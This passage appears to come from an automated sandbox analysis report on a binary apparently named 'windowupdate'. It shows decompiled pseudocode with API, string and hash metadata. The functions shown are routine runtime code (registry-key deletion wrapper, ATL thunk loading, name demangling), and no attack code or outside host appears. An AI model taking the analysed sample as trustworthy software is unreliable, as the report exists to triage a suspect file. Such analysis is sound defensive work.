					_t32 = L00D84930(_t49, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x29c, 0, "%ls", L"hAdvAPI32 != 0");
					_t45 = _t45 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t27 = GetProcAddress(_v12, "RegDeleteKeyTransactedA");
					__eflags = _t45 - _t45;
					_v16 = E00DC1520(_t27, _t45 - _t45);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t31 = _v16(_a4, _a8, 0, 0,  *_v8, 0);
					__eflags = _t45 - _t45;
					_t21 = E00DC1520(_t31, __eflags);
				} else {
					_t21 = 1;
				}
			}













                      0x00d33337
                      0x00d3333e
                      0x00d33345
                      0x00d3334c
                      0x00d33355
                      0x00d333f3
                      0x00d333f7
                      0x00d33412
                      0x00d33412
                      0x00d33418
                      0x00d33425
                      0x00d33425
                      0x00d33403
                      0x00d33409
                      0x00d3340b
                      0x00000000
                      0x00d3340b
                      0x00d3336f
                      0x00d33372
                      0x00d33376
                      0x00d33390
                      0x00d33395
                      0x00d3339b
                      0x00d3339d
                      0x00d3339d
                      0x00d3339b
                      0x00d333a2
                      0x00d333b6
                      0x00d333bc
                      0x00d333c3
                      0x00d333c6
                      0x00d333ca
                      0x00000000
                      0x00d333ee
                      0x00d333e2
                      0x00d333e5
                      0x00d333e7
                      0x00d333a4
                      0x00d333a4
                      0x00d333a4

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33362
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00D333B6
                      • RegDeleteKeyA.ADVAPI32(CCCCCCCC,CCCCCCCC), ref: 00D33403
                      Strings
                      • hAdvAPI32 != 0, xrefs: 00D33378
                      • %ls, xrefs: 00D3337D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33389
                      • Advapi32.dll, xrefs: 00D3335D
                      • RegDeleteKeyTransactedA, xrefs: 00D333AD
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegDeleteKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 588496660-2197841288
                      • Opcode ID: 9b02ccc17bf6a598cff90e517bd17e5f6ad5aab2709797419c698182c9cb69dd
                      • Instruction ID: 1ae48c9126e667f0f9531a000c4e9dd044f84af53de912b76f86861161403086
                      • Opcode Fuzzy Hash: 9b02ccc17bf6a598cff90e517bd17e5f6ad5aab2709797419c698182c9cb69dd
                      • Instruction Fuzzy Hash: 87214C36E10219FFCB10AB99C94AF9EBB74AB44700F148198F505AB291D675DE80DBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D466BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E00D466BA(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xf2021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xf2021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00d466c5
                      0x00d466e1
                      0x00d466e7
                      0x00d466eb
                      0x00d46765
                      0x00d46749
                      0x00d4674e
                      0x00d46751
                      0x00d46754
                      0x00d4675d
                      0x00d4675d
                      0x00d46769
                      0x00d466c7
                      0x00d466c7
                      0x00d466cc
                      0x00d466d3
                      0x00d466d3

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00D46BEE,00F20214,?,?,?,?,00D34D19), ref: 00D466CC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D46BEE,00F20214,?,?,?,?,00D34D19), ref: 00D466E1
                      • DecodePointer.KERNEL32(?), ref: 00D4675D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 642a9e4b8f618dae6885265a4e434551325ed7e89b0cc2ba3068357d55c15e81
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 55016531540315BFDA116B109D0BF8537945F13B59F0C0055BD46B62D3EAA1C90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4676A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E00D4676A(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xf2021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xf2021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00d46775
                      0x00d46791
                      0x00d46797
                      0x00d4679b
                      0x00d46815
                      0x00d467f9
                      0x00d467fe
                      0x00d46801
                      0x00d46804
                      0x00d4680d
                      0x00d4680d
                      0x00d46819
                      0x00d46777
                      0x00d46777
                      0x00d4677c
                      0x00d46783
                      0x00d46783

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00D46B8C,00F2020C,?,?,00D34CBB), ref: 00D4677C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,00000000,?,?,00D46B8C,00F2020C,?,?,00D34CBB), ref: 00D46791
                      • DecodePointer.KERNEL32(?), ref: 00D4680D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 6649d249e960bb592d8643ca54481f0d36467716a7b19a9ee862bf3b5b9f388b
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: B7012571581315FFCA115B109C0BF8537945F03B49F0C4055BC46B72D3EAA1D90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D468CA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E00D468CA(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xf2021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xf2021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00d468d5
                      0x00d468f1
                      0x00d468f7
                      0x00d468fb
                      0x00d46975
                      0x00d46959
                      0x00d4695e
                      0x00d46961
                      0x00d46964
                      0x00d4696d
                      0x00d4696d
                      0x00d46979
                      0x00d468d7
                      0x00d468d7
                      0x00d468dc
                      0x00d468e3
                      0x00d468e3

                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00D46C96,00F20210,?,?,?,00D34CDF,?,?,?), ref: 00D468DC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00D46C96,00F20210,?,?,?,00D34CDF,?,?,?), ref: 00D468F1
                      • DecodePointer.KERNEL32(?), ref: 00D4696D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 6af001dd96a5f9ce45fee0a9d2ec6bceb2f9497a9f976ea179a0070d88e24d44
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 50011232541315FBCE515B209C0AF8537A45B03746F0C0056B846A62D3DEF1D90AEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4681A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E00D4681A(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xf2021c == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00D4697D(_t15, "AtlThunk_AllocateData", 0xf2020c) == 0 || E00D4697D(_t15, "AtlThunk_InitData", 0xf20210) == 0 || E00D4697D(_t15, "AtlThunk_DataToCode", 0xf20214) == 0 || E00D4697D(_t15, "AtlThunk_FreeData", 0xf20218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xf2021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00d46825
                      0x00d46841
                      0x00d46847
                      0x00d4684b
                      0x00d468c5
                      0x00d468a9
                      0x00d468ae
                      0x00d468b1
                      0x00d468b4
                      0x00d468bd
                      0x00d468bd
                      0x00d468c9
                      0x00d46827
                      0x00d46827
                      0x00d4682c
                      0x00d46833
                      0x00d46833

                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00D46C3D,00F20218,?,?,?,00D44C21), ref: 00D4682C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00D46C3D,00F20218,?,?,?,00D44C21), ref: 00D46841
                      • DecodePointer.KERNEL32(?), ref: 00D468BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction ID: 9b4840535a97191d1b0fcdcfa524b84f106fe9dc5d71a823199a0351a2073fdc
                      • Opcode Fuzzy Hash: 4555d142e307ef2c95900e10662a3ab1482da759251fb09e7ff1a243248b48ce
                      • Instruction Fuzzy Hash: 02011E31681315BBCE115B11AC0AF863B949F03745F0C0066BC46A62D7EAA1D91EEAB7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D571F0 Relevance: 13.6, APIs: 9, Instructions: 124COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D571F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				signed int _t46;
				char* _t47;
				char* _t60;
				void* _t77;
				char* _t102;
				char* _t106;
				void* _t112;
				void* _t113;

				_t113 = __esi;
				_t112 = __edi;
				_t77 = __ebx;
				_t46 = _a16;
				_v32 =  *((intOrPtr*)(0xdc8c88 + _t46 * 8));
				_v28 =  *((intOrPtr*)(0xdc8c8c + _t46 * 8));
				_t47 =  *0xf20640; // 0x0
				if( *_t47 == 0) {
					E00D4F350( &_v16, 1);
					E00D4FCA0( &_v16,  &_v32);
					if(E00D5A560(_a8) == 0) {
						E00D4FD40( &_v16, _a8);
					}
					if(E00D5A560(_a12) == 0) {
						if(E00D5A560(_a8) == 0) {
							E00D4FDE0( &_v16, 0x20);
						}
						E00D4FD40( &_v16, _a12);
					}
					E00D4F240(_a4,  &_v16);
					return _a4;
				}
				_t106 =  *0xf20640; // 0x0
				if( *_t106 < 0x36) {
					L3:
					_t60 =  *0xf20640; // 0x0
					if( *_t60 != 0x5f) {
						E00D53A20(_t77, _t112, _t113,  &_v40, _a12, _a16, _a8, 0);
						if(_a16 != 1) {
							_v8 = 0;
						} else {
							_v8 = 1;
						}
						E00D56F40(_t77, _t112, _t113, _a4,  &_v40, _v8);
						return _a4;
					}
					L4:
					E00D4F1F0( &_v24,  &_v32);
					if(E00D5A560(_a8) == 0 && (E00D5A560(_a12) != 0 || E00D5A600(_a12) == 0)) {
						E00D4FD40( &_v24, _a8);
					}
					if(E00D5A560(_a12) == 0) {
						E00D4FD40( &_v24, _a12);
					}
					E00D55490(_t77, _t112, _t113, _a4,  &_v24);
					return _a4;
				}
				_t102 =  *0xf20640; // 0x0
				if( *_t102 <= 0x39) {
					goto L4;
				}
				goto L3;
			}

















                      0x00d571f0
                      0x00d571f0
                      0x00d571f0
                      0x00d571f6
                      0x00d57207
                      0x00d5720a
                      0x00d5720d
                      0x00d57217
                      0x00d57304
                      0x00d57310
                      0x00d5731f
                      0x00d57328
                      0x00d57328
                      0x00d57337
                      0x00d57343
                      0x00d5734a
                      0x00d5734a
                      0x00d57356
                      0x00d57356
                      0x00d57362
                      0x00000000
                      0x00d57367
                      0x00d5721d
                      0x00d57229
                      0x00d57239
                      0x00d57239
                      0x00d57244
                      0x00d572c6
                      0x00d572d2
                      0x00d572dd
                      0x00d572d4
                      0x00d572d4
                      0x00d572d4
                      0x00d572f0
                      0x00000000
                      0x00d572f8
                      0x00d57246
                      0x00d5724d
                      0x00d5725c
                      0x00d5727d
                      0x00d5727d
                      0x00d5728c
                      0x00d57295
                      0x00d57295
                      0x00d572a2
                      0x00000000
                      0x00d572aa
                      0x00d5722b
                      0x00d57237
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: EmptyName::is$MailboxNameName::Name::operator+=
                      • String ID:
                      • API String ID: 2270187897-0
                      • Opcode ID: 9043d448c590c13b00e6ffe1a7cf3e1c4d1a10e5fd79618c2dfdfe7403e10e6b
                      • Instruction ID: 0676d7d6efeea194b2d4421519f1920111c0de6e1cbf2ccaaba1a6b04562336f
                      • Opcode Fuzzy Hash: 9043d448c590c13b00e6ffe1a7cf3e1c4d1a10e5fd79618c2dfdfe7403e10e6b
                      • Instruction Fuzzy Hash: 6A410A71A042099BCF18EF94E991DEE7775EF54302F248168FD269B251EB30AE08CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D58500 Relevance: 13.6, APIs: 9, Instructions: 124COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D58500(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				signed int _v5;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v96;
				char _v140;
				char _v184;
				intOrPtr _t41;
				signed int _t50;
				void* _t59;
				signed int _t61;
				signed int _t71;
				intOrPtr _t73;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				intOrPtr _t96;
				signed int _t98;
				signed int _t102;
				signed int _t103;

				_t106 = __esi;
				_t105 = __edi;
				_t66 = __ebx;
				_t94 =  *0xf20640; // 0x0
				if( *_t94 != 0x3f) {
					L2:
					E00D4F350(_a4, 2);
					return _a4;
				}
				_t95 =  *0xf20640; // 0x0
				if( *((char*)(_t95 + (1 << 0))) == 0x24) {
					_t71 =  *0xf20640; // 0x0
					 *0xf20640 = _t71 + 2;
					_t96 =  *0xf20634; // 0x0
					_v20 = _t96;
					_t41 =  *0xf20638; // 0x0
					_v24 = _t41;
					_t73 =  *0xf2063c; // 0x0
					_v28 = _t73;
					E00D4F5E0( &_v96);
					E00D4F5E0( &_v140);
					E00D4F5E0( &_v184);
					 *0xf20634 =  &_v96;
					 *0xf20638 =  &_v140;
					 *0xf2063c =  &_v184;
					E00D4F3F0( &_v16);
					_v5 = 0;
					_t98 =  *0xf20640; // 0x0
					__eflags =  *_t98 - 0x3f;
					if( *_t98 != 0x3f) {
						E00D4F820( &_v16, E00D5A1E0(__ebx, __edi, __esi,  &_v44, 1, 1));
					} else {
						_t91 =  *0xf20640; // 0x0
						 *0xf20640 = _t91 + 1;
						E00D4F820( &_v16, E00D55E80(__ebx, __edi, __esi,  &_v36, 1,  &_v5));
					}
					_t50 = E00D5A560( &_v16);
					__eflags = _t50;
					if(_t50 != 0) {
						 *0xf2064c = 1;
					}
					__eflags = _v5 & 0x000000ff;
					if((_v5 & 0x000000ff) == 0) {
						E00D4FDE0( &_v16, 0x3c);
						E00D4FD40( &_v16, E00D58210(_t66, _t105, _t106, __eflags,  &_v52));
						_t59 = E00D55990( &_v16);
						__eflags = _t59 - 0x3e;
						if(_t59 == 0x3e) {
							E00D4FDE0( &_v16, 0x20);
						}
						E00D4FDE0( &_v16, 0x3e);
						__eflags = _a8 & 0x000000ff;
						if((_a8 & 0x000000ff) != 0) {
							_t61 =  *0xf20640; // 0x0
							__eflags =  *_t61;
							if( *_t61 != 0) {
								_t102 =  *0xf20640; // 0x0
								_t103 = _t102 + 1;
								__eflags = _t103;
								 *0xf20640 = _t103;
							}
						}
					}
					 *0xf20634 = _v20;
					 *0xf20638 = _v24;
					 *0xf2063c = _v28;
					E00D4F240(_a4,  &_v16);
					return _a4;
				}
				goto L2;
			}



























                      0x00d58500
                      0x00d58500
                      0x00d58500
                      0x00d58511
                      0x00d5851e
                      0x00d58537
                      0x00d5853c
                      0x00000000
                      0x00d58541
                      0x00d58528
                      0x00d58535
                      0x00d58549
                      0x00d58552
                      0x00d58558
                      0x00d5855e
                      0x00d58561
                      0x00d58566
                      0x00d58569
                      0x00d5856f
                      0x00d58575
                      0x00d58580
                      0x00d5858b
                      0x00d58593
                      0x00d5859f
                      0x00d585aa
                      0x00d585b3
                      0x00d585b8
                      0x00d585bc
                      0x00d585c5
                      0x00d585c8
                      0x00d5860a
                      0x00d585ca
                      0x00d585ca
                      0x00d585d3
                      0x00d585ef
                      0x00d585ef
                      0x00d58612
                      0x00d58617
                      0x00d58619
                      0x00d5861b
                      0x00d5861b
                      0x00d58626
                      0x00d58628
                      0x00d5862f
                      0x00d58644
                      0x00d5864c
                      0x00d58654
                      0x00d58657
                      0x00d5865e
                      0x00d5865e
                      0x00d58668
                      0x00d58671
                      0x00d58673
                      0x00d58675
                      0x00d5867d
                      0x00d5867f
                      0x00d58681
                      0x00d58687
                      0x00d58687
                      0x00d5868a
                      0x00d5868a
                      0x00d5867f
                      0x00d58673
                      0x00d58693
                      0x00d5869b
                      0x00d586a4
                      0x00d586b1
                      0x00000000
                      0x00d586b6
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
                      • String ID:
                      • API String ID: 3761117093-0
                      • Opcode ID: 51a3f87a1a6cd0faad9903c9dc5e1cd5a09d186ea42d25a4bec96d7f50cadef8
                      • Instruction ID: 822153b1dfe8a752f31a517ec80d933f770e520940fa82bc8dac2fecce2525e0
                      • Opcode Fuzzy Hash: 51a3f87a1a6cd0faad9903c9dc5e1cd5a09d186ea42d25a4bec96d7f50cadef8
                      • Instruction Fuzzy Hash: A851B971D002189BDB24DF54EC91AEE7B75FB80301F144169EC156B6A3EF34AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DB48F0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 335COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00DB48F0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
